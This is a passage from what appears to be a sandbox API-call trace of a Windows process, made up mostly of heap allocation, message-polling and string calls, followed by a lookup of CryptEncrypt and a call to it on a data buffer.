Size=0xc) returned 0x2e50788 [0156.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0156.808] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0156.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0156.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0156.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0156.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0156.808] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0156.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0156.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0156.808] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0156.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0156.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0156.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0156.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0156.808] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0156.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0156.808] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0156.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0156.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0156.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0156.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0156.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0156.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0156.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0156.809] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0156.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0156.809] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0156.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0156.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0156.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0156.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0156.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fbc8 [0156.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0156.809] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0156.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fbc8 | out: hHeap=0x970000) returned 1 [0156.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0156.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507d0 [0156.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0156.809] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0156.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0156.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0156.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0156.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0156.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0156.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0156.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0156.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0156.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0156.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0156.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0156.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0156.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0156.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0156.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0156.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0156.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0156.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0156.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0156.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0156.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0156.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0156.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0156.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0156.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0156.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0156.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0156.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0156.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0156.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0156.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0156.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0156.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0156.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0156.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0156.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0156.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0156.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0156.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0156.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0156.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0156.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0156.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0156.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0156.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0156.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0156.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0156.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0156.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0156.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0156.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0156.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0156.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0156.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0156.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0156.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0156.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0156.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0156.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0156.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0156.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0156.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0156.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0156.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0156.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xa57e) returned 0x2f330a8 [0156.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0156.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f330a8 | out: hHeap=0x970000) returned 1 [0156.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0156.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0156.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0156.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0156.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0156.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0156.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0156.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0156.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e56430 [0156.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0156.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0156.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0156.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0156.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0156.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0156.815] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0156.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0156.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0156.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0156.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0156.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0156.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0156.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0156.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0156.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0156.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0156.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0156.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0156.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0156.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0156.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0156.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0156.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0156.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0156.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0156.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0156.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0156.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0156.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0156.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0156.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0156.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0156.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0156.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0156.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0156.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0156.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0156.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0156.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0156.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0156.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0156.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0156.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0156.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0156.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0156.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0156.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0156.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0156.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0156.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0156.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0156.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0156.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0156.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0156.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0156.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0156.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0156.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0156.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0156.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0156.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0156.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0156.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0156.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0156.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0156.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0156.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0156.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0156.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0156.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0156.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0156.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0156.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0156.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0156.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0156.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0156.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0156.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0156.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0156.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0156.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0156.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0156.819] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0156.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e50ab8 [0156.819] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e50ab8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0156.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0156.819] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0156.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0156.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0156.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e543a0 [0156.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0156.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0156.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0156.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0156.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0156.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0156.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0156.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0156.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0156.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0156.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0156.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0156.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0156.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0156.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0156.820] CryptEncrypt (in: hKey=0xa87610, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0xa57e, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0xa580) returned 1 [0156.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0156.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0156.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0156.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0156.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0156.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0156.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0156.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0156.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0156.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0156.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0156.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0156.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0156.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0156.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0156.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0156.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0156.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0156.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: 